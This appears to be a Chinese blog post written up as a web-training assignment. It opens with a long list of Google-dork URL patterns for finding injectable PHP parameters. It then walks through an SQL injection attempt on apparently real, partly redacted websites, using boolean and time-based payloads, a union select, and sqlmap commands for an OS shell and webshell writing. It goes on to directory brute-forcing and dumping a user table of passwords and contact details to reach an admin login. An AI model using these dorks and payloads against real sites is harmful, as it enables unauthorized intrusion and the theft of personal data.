item.php?prodtype=</br>
item.php?shopcd=</br>
item_details.php?catid=</br>
item_list.php?maingroup
item_show.php?code_no=</br>
itemDesc.php?CartId=</br>
itemdetail.php?item=</br>
itemdetails.php?catalogid=</br>
learnmore.php?cartID=</br>
links.php?catid=</br>
list.php?bookid=</br>
List.php?CatID=</br>
listcategoriesandproducts.php?idCategory=</br>
modline.php?id=</br>
myaccount.php?catid=</br>
news.php?id=</br>
order.php?BookID=</br>
order.php?id=</br>
order.php?item_ID=</br>
OrderForm.php?Cart=</br>
page.php?PartID=</br>
payment.php?CartID=</br>
pdetail.php?item_id=</br>
powersearch.php?CartId=</br>
price.php</br>
privacy.php?cartID=</br>
prodbycat.php?intCatalogID=</br>
prodetails.php?prodid=</br>
prodlist.php?catid=</br>
product.php?bookID=</br>
product.php?intProdID=</br>
product_info.php?item_id=</br>
productDetails.php?idProduct=</br>
productDisplay.php</br>
productinfo.php?item=</br>
productlist.php?ViewType=</br>Category&CategoryID=</br>
productpage.php</br>
products.php?ID=</br>
products.php?keyword=</br>
products_category.php?CategoryID=</br>
products_detail.php?CategoryID=</br>
productsByCategory.php?intCatalogID=</br>
prodView.php?idProduct=</br>
promo.php?id=</br>
promotion.php?catid=</br>
pview.php?Item=</br>
resellers.php?idCategory=</br>
results.php?cat=</br>
savecart.php?CartId=</br>
search.php?CartID=</br>
searchcat.php?search_id=</br>
Select_Item.php?id=</br>
Services.php?ID=</br>
shippinginfo.php?CartId=</br>
shop.php?a=</br>
shop.php?action=</br>
shop.php?bookid=</br>
shop.php?cartID=</br>
shop_details.php?prodid=</br>
shopaddtocart.php
shopaddtocart.php?catalogid=</br>
shopbasket.php?bookid=</br>
shopbycategory.php?catid=</br>
shopcart.php?title=</br>
shopcreatorder.php</br>
shopcurrency.php?cid=</br>
shopdc.php?bookid=</br>
shopdisplaycategories.php</br>
shopdisplayproduct.php?catalogid=</br>
shopdisplayproducts.php</br>
shopexd.php</br>
shopexd.php?catalogid=</br>
shopping_basket.php?cartID=</br>
shopprojectlogin.php</br>
shopquery.php?catalogid=</br>
shopremoveitem.php?cartid=</br>
shopreviewadd.php?id=</br>
shopreviewlist.php?id=</br>
ShopSearch.php?CategoryID=</br>
shoptellafriend.php?id=</br>
shopthanks.php</br>
shopwelcome.php?title=</br>
show_item.php?id=</br>
show_item_details.php?item_id=</br>
showbook.php?bookid=</br>
showStore.php?catID=</br>
shprodde.php?SKU=</br>
specials.php?id=</br>
store.php?id=</br>
store_bycat.php?id=</br>
store_listing.php?id=</br>
Store_ViewProducts.php?Cat=</br>
store-details.php?id=</br>
storefront.php?id=</br>
storefronts.php?title=</br>
storeitem.php?item=</br>
StoreRedirect.php?ID=</br>
subcategories.php?id=</br>
tek9.php?</br>
template.php?Action=</br>Item&pid=</br>
topic.php?ID=</br>
tuangou.php?bookid=</br>
type.php?iType=</br>
updatebasket.php?bookid=</br>
updates.php?ID=</br>
view.php?cid=</br>
view_cart.php?title=</br>
view_detail.php?ID=</br>
viewcart.php?CartId=</br>
viewCart.php?userID=</br>
viewCat_h.php?idCategory=</br>
viewevent.php?EventID=</br>
viewitem.php?recor=</br>
viewPrd.php?idcategory=</br>
ViewProduct.php?misc=</br>
voteList.php?item_ID=</br>
whatsnew.php?idCategory=</br>
WsAncillary.php?ID=</br>
WsPages.php?ID=</br>noticiasDetalle.php?xid=</br>
sitio/item.php?idcd=</br>
index.php?site=</br>
de/content.php?page_id=</br>
gallerysort.php?iid=</br>
products.php?type=</br>
event.php?id=</br>
showfeature.php?id=</br>
home.php?ID=</br>
tas/event.php?id=</br>
profile.php?id=</br>
details.php?id=</br>
past-event.php?id=</br>
index.php?action=</br>
site/products.php?prodid=</br>
page.php?pId=</br>
resources/vulnerabilities_list.php?id=</br>
site.php?id=</br>
products/index.php?rangeid=</br>
global_projects.php?cid=</br>
publications/view.php?id=</br>
display_page.php?id=</br>
pages.php?ID=</br>
lmsrecords_cd.php?cdid=</br>
product.php?prd=</br>
cat/?catid=</br>
products/product-list.php?id=</br>
debate-detail.php?id=</br>
cbmer/congres/page.php?LAN=</br>
content.php?id=</br>
news.php?ID=</br>
photogallery.php?id=</br>
index.php?id=</br>
product/product.php?product_no=</br>
nyheder.htm?show=</br>
book.php?ID=</br>
print.php?id=</br>
detail.php?id=</br>
book.php?id=</br>
content.php?PID=</br>
more_detail.php?id=</br>
content.php?id=</br>
view_items.php?id=</br>
view_author.php?id=</br>
main.php?id=</br>
english/fonction/print.php?id=</br>
magazines/adult_magazine_single_page.php?magid=</br>
product_details.php?prodid=</br>
magazines/adult_magazine_full_year.php?magid=</br>
products/card.php?prodID=</br>
catalog/product.php?cat_id=</br>
e_board/modifyform.html?code=</br>
community/calendar-event-fr.php?id=</br>
products.php?p=</br>
news.php?id=</br>
view/7/9628/1.html?reply=</br>
product_details.php?prodid=</br>
catalog/product.php?pid=</br>
rating.php?id=</br>
?page=</br>
catalog/main.php?cat_id=</br>
index.php?page=</br>
detail.php?prodid=</br>
products/product.php?pid=</br>
news.php?id=</br>
book_detail.php?BookID=</br>
catalog/main.php?cat_id=</br>
catalog/main.php?cat_id=</br>
default.php?cPath=</br>
catalog/main.php?cat_id=</br>
catalog/main.php?cat_id=</br>
category.php?catid=</br>
categories.php?cat=</br>
categories.php?cat=</br>
detail.php?prodID=</br>
detail.php?id=</br>
category.php?id=</br>
hm/inside.php?id=</br>
index.php?area_id=</br>
gallery.php?id=</br>
products.php?cat=</br>
products.php?cat=</br>
media/pr.php?id=</br>
books/book.php?proj_nr=</br>
products/card.php?prodID=</br>
general.php?id=</br>
news.php?t=</br>
usb/devices/showdev.php?id=</br>
content/detail.php?id=</br>
templet.php?acticle_id=</br>
news/news/title_show.php?id=</br>
product.php?id=</br>
index.php?url=</br>
cryolab/content.php?cid=</br>
ls.php?id=</br>
s.php?w=</br>
abroad/page.php?cid=</br>
bayer/dtnews.php?id=</br>
news/temp.php?id=</br>
index.php?url=</br>
book/bookcover.php?bookid=</br>
index.php/en/component/pvm/?view=</br>
product/list.php?pid=</br>
cats.php?cat=</br>
software_categories.php?cat_id=</br>
print.php?sid=</br>
docDetail.aspx?chnum=</br>
index.php?section=</br>
index.php?page=</br>
index.php?page=</br>
en/publications.php?id=</br>
events/detail.php?ID=</br>
forum/profile.php?id=</br>
media/pr.php?id=</br>
content.php?ID=</br>
cloudbank/detail.php?ID=</br>
pages.php?id=</br>
news.php?id=</br>
beitrag_D.php?id=</br>
content/index.php?id=</br>
index.php?i=</br>
?action=</br>
index.php?page=</br>
beitrag_F.php?id=</br>
index.php?pageid=</br>
page.php?modul=</br>
detail.php?id=</br>
index.php?w=</br>
index.php?modus=</br>
news.php?id=</br>
news.php?id=</br>
aktuelles/meldungen-detail.php?id=</br>
item.php?id=</br>
obio/detail.php?id=</br>
page/de/produkte/produkte.php?prodID=</br>
packages_display.php?ref=</br>
shop/index.php?cPath=</br>
modules.php?bookid=</br>
product-range.php?rangeID=</br>
en/news/fullnews.php?newsid=</br>
deal_coupon.php?cat_id=</br>
show.php?id=</br>
blog/index.php?idBlog=</br>
redaktion/whiteteeth/detail.php?nr=</br>
HistoryStore/pages/item.php?itemID=</br>
aktuelles/veranstaltungen/detail.php?id=</br>
tecdaten/showdetail.php?prodid=</br>
?id=</br>
rating/stat.php?id=</br>
content.php?id=</br>
viewapp.php?id=</br>
item.php?id=</br>
news/newsitem.php?newsID=</br>
FernandFaerie/index.php?c=</br>
show.php?id=</br>
?cat=</br>
categories.php?cat=</br>
category.php?c=</br>
product_info.php?id=</br>
prod.php?cat=</br>
store/product.php?productid=</br>
browsepr.php?pr=</br>
product-list.php?cid=</br>
products.php?cat_id=</br>
product.php?ItemID=</br>
category.php?c=</br>
main.php?id=</br>
article.php?id=</br>
showproduct.php?productId=</br>
view_item.php?item=</br>
skunkworks/content.php?id=</br>
index.php?id=</br>
item_show.php?id=</br>
publications.php?Id=</br>
index.php?t=</br>
view_items.php?id=</br>
portafolio/portafolio.php?id=</br>
YZboard/view.php?id=</br>
index_en.php?ref=</br>
index_en.php?ref=</br>
category.php?id_category=</br>
main.php?id=</br>
main.php?id=</br>
calendar/event.php?id=</br>
default.php?cPath=</br>
pages/print.php?id=</br>
index.php?pg_t=</br>
_news/news.php?id=</br>
forum/showProfile.php?id=</br>
fr/commande-liste-categorie.php?panier=</br>
downloads/shambler.php?id=</br>
sinformer/n/imprimer.php?id=</br>
More_Details.php?id=</br>
directory/contenu.php?id_cat=</br>
properties.php?id_cat=</br>
forum/showProfile.php?id=</br>
downloads/category.php?c=</br>
index.php?cat=</br>
product_info.php?products_id=</br>
product_info.php?products_id=</br>
product-list.php?category_id=</br>
detail.php?siteid=</br>
projects/event.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
melbourne_details.php?id=</br>
more_details.php?id=</br>
detail.php?id=</br>
more_details.php?id=</br>
home.php?cat=</br>
idlechat/message.php?id=</br>
detail.php?id=</br>
print.php?sid=</br>
more_details.php?id=</br>
default.php?cPath=</br>
events/event.php?id=</br>
brand.php?id=</br>
toynbeestudios/content.php?id=</br>
show-book.php?id=</br>
more_details.php?id=</br>
store/default.php?cPath=</br>
property.php?id=</br>
product_details.php?id=</br>
more_details.php?id=</br>
view-event.php?id=</br>
content.php?id=</br>
book.php?id=</br>
page/venue.php?id=</br>
print.php?sid=</br>
colourpointeducational/more_details.php?id=</br>
print.php?sid=</br>
browse/book.php?journalID=</br>
section.php?section=</br>
bookDetails.php?id=</br>
profiles/profile.php?profileid=</br>
event.php?id=</br>
gallery.php?id=</br>
category.php?CID=</br>
corporate/newsreleases_more.php?id=</br>
print.php?id=</br>
view_items.php?id=</br>
more_details.php?id=</br>
county-facts/diary/vcsgen.php?id=</br>
idlechat/message.php?id=</br>
podcast/item.php?pid=</br>
products.php?act=</br>
details.php?prodId=</br>
socsci/events/full_details.php?id=</br>
ourblog.php?categoryid=</br>
mall/more.php?ProdID=</br>
archive/get.php?message_id=</br>
review/review_form.php?item_id=</br>
english/publicproducts.php?groupid=</br>
news_and_notices.php?news_id=</br>
rounds-detail.php?id=</br>
gig.php?id=</br>
board/view.php?no=</br>
index.php?modus=</br>
news_item.php?id=</br>
rss.php?cat=</br>
products/product.php?id=</br>
details.php?ProdID=</br>
els_/product/product.php?id=</br>
store/description.php?iddesc=</br>
socsci/news_items/full_story.php?id=</br>
modules/forum/index.php?topic_id=</br>
feature.php?id=</br>
products/Blitzball.htm?id=</br>
profile_print.php?id=</br>
questions.php?questionid=</br>
html/scoutnew.php?prodid=</br>
main/index.php?action=</br>
********.php?cid=</br>
********.php?cid=</br>
news.php?type=</br>
index.php?page=</br>
viewthread.php?tid=</br>
summary.php?PID=</br>
news/latest_news.php?cat_id=</br>
index.php?cPath=</br>
category.php?CID=</br>
index.php?pid=</br>
more_details.php?id=</br>
specials.php?osCsid=</br>
search/display.php?BookID=</br>
articles.php?id=</br>
print.php?sid=</br>
page.php?id=</br>
more_details.php?id=</br>
newsite/pdf_show.php?id=</br>
shop/category.php?cat_id=</br>
shopcafe-shop-product.php?bookId=</br>
shop/books_detail.php?bookID=</br>
index.php?cPath=</br>
more_details.php?id=</br>
news.php?id=</br>
more_details.php?id=</br>
shop/books_detail.php?bookID=</br>
more_details.php?id=</br>
blog.php?blog=</br>
index.php?pid=</br>
prodotti.php?id_cat=</br>
category.php?CID=</br>
more_details.php?id=</br>
poem_list.php?bookID=</br>
more_details.php?id=</br>
content.php?categoryId=</br>
authorDetails.php?bookID=</br>
press_release.php?id=</br>
item_list.php?cat_id=</br>
colourpointeducational/more_details.php?id=</br>
index.php?pid=</br>
download.php?id=</br>
shop/category.php?cat_id=</br>
i-know/content.php?page=</br>
store/index.php?cat_id=</br>
product.php?pid=</br>
showproduct.php?prodid=</br>
product.php?productid=</br>
productlist.php?id=</br>
index.php?pageId=</br>
productlist.php?tid=</br>
product-list.php?id=</br>
onlinesales/product.php?product_id=</br>
garden_equipment/Fruit-Cage/product.php?pr=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
productlist.php?tid=</br>
showsub.php?id=</br>
productlist.php?fid=</br>
products.php?cat=</br>
products.php?cat=</br>
product-list.php?id=</br>
product.php?sku=</br>
store/product.php?productid=</br>
products.php?cat=</br>
productList.php?cat=</br>
product_detail.php?product_id=</br>
product.php?pid=</br>
products.php?categoryID=</br>
modules.php?****=</br>
message/comment_threads.php?postID=</br>
artist_art.php?id=</br>
products.php?cat=</br>
index.php?option=</br>
ov_tv.php?item=</br>
index.php?lang=</br>
showproduct.php?cat=</br>
index.php?lang=</br>
product.php?bid=</br>
product.php?bid=</br>
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=</br>
item_show.php?lid=</br>
?pagerequested=</br>
downloads.php?id=</br>
print.php?sid=</br>
print.php?sid=</br>
product.php?intProductID=</br>
productList.php?id=</br>
product.php?intProductID=</br>
more_details.php?id=</br>
more_details.php?id=</br>
books.php?id=</br>
index.php?offs=</br>
mboard/replies.php?parent_id=</br>
Computer Science.php?id=</br>
news.php?id=</br>
pdf_post.php?ID=</br>
reviews.php?id=</br>
art.php?id=</br>
prod.php?cat=</br>
event_info.php?p=</br>
view_items.php?id=</br>
home.php?cat=</br>
item_book.php?CAT=</br>
www/index.php?page=</br>
schule/termine.php?view=</br>
goods_detail.php?data=</br>
wiki/pmwiki.php?page****=</br>
summary.php?PID=</br>
productlist.php?grpid=</br>
cart/product.php?productid=</br>
db/CART/product_details.php?product_id=</br>
ProductList.php?id=</br>
products/product.php?id=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
product_ranges_view.php?ID=</br>
cei/cedb/projdetail.php?projID=</br>
products.php?DepartmentID=</br>
product.php?shopprodid=</br>
product.php?shopprodid=</br>
product_info.php?products_id=</br>
index.php?news=</br>
education/content.php?page=</br>
Interior/productlist.php?id=</br>
storemanager/contents/item.php?page_code=</br>
view_items.php?id=</br>
customer/board.htm?mode=</br>
help/com_view.html?code=</br>
n_replyboard.php?typeboard=</br>
eng_board/view.php?T****=</br>
prev_results.php?prodID=</br>
bbs/view.php?no=</br>
gnu/?doc=</br>
zb/view.php?uid=</br>
global/product/product.php?gubun=</br>
m_view.php?ps_db=</br>
naboard/memo.php?bd=</br>
bookmark/mybook/bookmark.php?bookPageNo=</br>
board/board.html?table=</br>
kboard/kboard.php?board=</br>
order.asp?lotid=</br>
english/board/view****.php?code=</br>
goboard/front/board_view.php?code=</br>
bbs/bbsView.php?id=</br>
boardView.php?bbs=</br>
eng/rgboard/view.php?&bbs_id=</br>
product/product.php?cate=</br>
content.php?p=</br>
page.php?module=</br>
?pid=</br>
bookpage.php?id=</br>
二、最后筛选出4个目标:
- https:xxxxxicsp.tw/about.php?id=2
- http://xxxxcom/about.php?cid=16
- http://xxxxx/search.php?ss=office/about.php?cartID=1.)),,..)%27
- http://wwwxxxxx/about.php?id=37
- 选一个开始
我选择的是最后一个:
id=1' and 1=1%23:暴出路径:估计是字符型注入。
/data/home/xxxxxxxxx2341xxx085/htdocs/ /newsContentView.php 这种路径猜测是linux系统
这个时候离谱的就来了。
离谱的地方有3个:
- 只要输入错误的,都会返回首页并且报错上面那张图。
- 用常规的测试方法无法测试出是字符型还是数字型
- 经过反复测试,貌似只有id=4存在sleep注入以及bool盲注。
- Map注入的时候一开始跑出来一堆\xxxx的乱码的一大段??怎么回事??还有接下来“检测id是不是假阳性??”,,什么鬼??、
- Order by测试当前查询表有多少行的时候,order by2,3,4,5,8,9都试过,发现都是返回true。但是测试order by 999的时候报错了:
是否说明列数小于(或者=)真实列数,都会ture,大于则会爆出上图这个错误。
最后定位25列
参考sqlmap的资料:https://wwwblogs/waw/p/10828237.html
http://www.vuln/1992
我原本想着用我的sqlmap 的盲注脚本,但是map不香吗?
接下来无法截图,因为我在我的kali里面操作,vmtools是废的。所以只会记录简单的命令和结果。
Sqlmap 的 --current-dbs 当前数据库
--delay=xx xx是多少秒,隔开多少秒请求一次 --time-sec
--thread=xx xx是线程数,默认10还是1说法不同,反正可是设置
-u url · –is-dba 当前用户权限(是否为root权限)
· –dbs 所有数据库
· –current-db 网站当前数据库
· –users 所有数据库用户
· –current-user 当前数据库用户
–-os-shell 交互式的操作系统的shell
id=4 and sleep(5)%23 生效
二分法测试?id=4 and length(database())>8%23 数据库名大于8
我在自己电脑上测试没有加current的dbs(测试所有数据库名),第一个是information_schema一共长度18,所以我担心当前数据库会不会就是这个:
注意观察上面两幅图,第一张是返回bool是错误的状态,第二张是ture。
我测试的时候加了delay 、waf identy 、技术选bool 、currnt-db、线程再设置成1
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
--file-read=‘’里面要加绝对路径才能读取文件。。9.file-write写入文件到web
sqlmap -u http://www.xxxxx/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
测出目标的mysql版本大于5.0,还说我设置了单线程太慢要重新检测还是重试,我依旧给了它最爱吃的“线程=1”。然后真的等好久呀,随着current的第一个字母“b”出现的时候,我才真的确定我应该是可以写个shell的(php版本为5.2.17. apache系统,没有)
拿到了当前数据库名,接着osshell看看能不能getshell,他会让你选择当前web服务器支持什么语言?传不了,没权限,。咋办?Tmp总有权限吧??
连读取tmp都没办法:
只好
www.xxxxxxxt/about.php?id=4 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5%23
手工注入了。
- 还是不行,重新整理思路
发现自己不是dba,而且找不到能够写码的目录,所以转化思路:爆破目录,查看表,有没有能够登录的点。登进去之后管理员上传文件getsell。
大致扫出来的能用的目录如下:
[
[17:12:21] 403 - 206B - /inc/
[1
4.1有用信息1
ftp.txt下面写着:
主机管理控制台xxxxxx8
xxxxxxx.57
4.2有用信息2
DreamWeaver
4.3有用的信息3
只有2个数据库 一个information 一个bdm2266XXXXX 看第二个数据库应该是用户自己建立的,里头的表名有:
Database:xxxxx_db
[9 tables]
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda | user表中有用户的id、住址、密码等
| Column | Type |
+----------+--------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) | 然后登进去
最后根据指纹发现是fckeditor,但是这个版本依旧无法getshell。所以这是一次失败的作业
更多推荐
2021-08-28web培训作业2(sql实战注入尝试getshell,googlehacking,数据库拿到账户信息登录后台管理,fck的upload)
发布评论